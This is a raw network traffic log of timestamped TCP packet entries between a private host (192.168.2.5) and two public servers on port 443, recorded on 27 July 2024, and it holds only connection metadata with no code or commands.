Jul 27, 2024 07:30:19.433784008 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.434036970 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.434048891 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.434099913 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.434104919 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.434376955 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.434410095 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.434473991 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.434473991 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.434480906 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.434684992 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.434864998 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.434885979 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.434952974 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.434959888 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.436956882 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.442574024 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.443559885 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.443576097 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.443646908 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.443651915 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.444123030 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.444139004 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.444192886 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.444199085 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.444225073 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.444242954 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.446660995 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.492568970 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.492589951 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.492750883 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.492758036 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.492803097 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.495944977 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.523296118 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.523312092 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.523483992 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.523492098 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.523539066 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.524219036 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.524233103 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.524283886 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.524290085 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.524564028 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.524579048 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.524614096 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.524619102 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.524637938 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.524667978 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.524987936 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.525010109 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.525058985 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.525068998 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.525079966 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.525106907 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.525352001 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.525376081 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.525409937 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.525413036 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.525439024 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.525450945 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.534554958 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.534579992 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.534629107 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.534632921 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.534672022 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.534871101 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.534883976 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.534946918 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.534951925 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.537127972 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.558310986 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.583446980 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.583461046 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.583621979 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.583628893 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.583671093 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.614095926 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.614114046 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.614296913 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.614320993 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.614367962 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.614839077 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.614859104 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.614896059 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.614901066 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.614927053 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.614943027 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.615175009 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.615189075 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.615240097 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.615246058 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.615781069 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.615818977 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.615852118 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.615856886 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.615876913 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.615904093 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.616215944 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.616230965 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.616281986 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.616287947 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.616298914 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.616326094 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.618628979 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.634630919 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.634644985 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.634718895 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.634722948 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.634876966 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.634892941 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.634931087 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.634936094 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.634953976 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.634979010 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.658236980 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.674351931 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.674372911 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.674525976 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.674525976 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.674535990 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.676531076 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.705095053 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.705112934 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.705167055 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.705174923 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.705569983 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.705588102 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.705650091 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.705655098 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.705986023 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.705998898 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.706041098 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.706047058 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.706063032 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.706083059 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.706262112 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.706274986 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.706315041 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.706319094 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.706327915 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.706876993 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.706892967 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.706928968 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.706933975 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.706943989 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.706975937 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.719281912 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.719296932 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.719352961 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.719360113 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.719393015 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.719683886 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.719696999 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.719741106 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.719747066 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.719800949 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.764935970 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.764954090 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.765008926 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.765012980 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.765949965 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.795630932 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.795644999 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.795730114 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.795736074 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.795928001 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.796322107 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.796335936 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.796386003 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.796391010 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.796420097 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.796428919 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.796909094 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.796931982 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.796972990 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.796977997 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.796989918 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.797024965 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.797302008 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.797317028 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.797353983 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.797358990 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.797372103 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.797408104 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.797657967 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.797673941 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.797713041 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.797718048 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.797735929 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.797759056 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.809746981 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.809761047 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.809829950 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.809837103 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.809861898 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.809881926 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.810101986 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.810115099 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.810157061 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.810159922 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.810184002 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.810203075 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.835273027 CEST	443	51813	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:19.835383892 CEST	51813	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:19.837758064 CEST	51813	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:19.837786913 CEST	443	51813	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:19.837856054 CEST	51813	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:19.837867022 CEST	443	51813	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:19.838202953 CEST	443	51813	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:19.838506937 CEST	51813	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:19.838555098 CEST	443	51813	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:19.855613947 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.855634928 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.855698109 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.855704069 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.855829954 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.886967897 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.887002945 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.887036085 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.887039900 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.887068987 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.887090921 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.887345076 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.887358904 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.887412071 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.887414932 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.887474060 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.887690067 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.887732029 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.887758017 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.887762070 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.887778997 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.887800932 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.888087988 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.888109922 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.888170004 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.888174057 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.888199091 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.888217926 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.888504028 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.888528109 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.888580084 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.888585091 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.888611078 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.888617992 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.891249895 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.900266886 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.900291920 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.900325060 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.900331974 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.900360107 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.900371075 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.901148081 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.901177883 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.901218891 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.901222944 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.901248932 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.901261091 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.946382999 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.946399927 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.946489096 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.946495056 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.946578979 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.977264881 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.977286100 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.977349043 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.977355957 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.977432966 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.977740049 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.977755070 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.977797985 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.977802992 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.977824926 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.977843046 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.978199005 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.978214979 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.978272915 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.978276968 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.978468895 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.978965998 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.978980064 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.979027987 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.979032993 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.979058027 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.979068041 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.979320049 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.979341984 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.979378939 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.979383945 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.979414940 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.979422092 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.980501890 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.991045952 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.991058111 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.991103888 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.991108894 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.991137028 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.991143942 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.992161989 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.992177010 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.992232084 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.992237091 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.992268085 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.992273092 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.037162066 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.037174940 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.037240982 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.037245989 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.040501118 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.068136930 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.068165064 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.068231106 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.068237066 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.068588972 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.068628073 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.068655014 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.068660021 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.068676949 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.068706989 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.069204092 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.069231033 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.069252014 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.069255114 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.069278002 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.069298983 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.069688082 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.069700956 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.069746017 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.069750071 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.069770098 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.069788933 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.070051908 CEST	443	51812	185.149.100.242	192.168.2.5
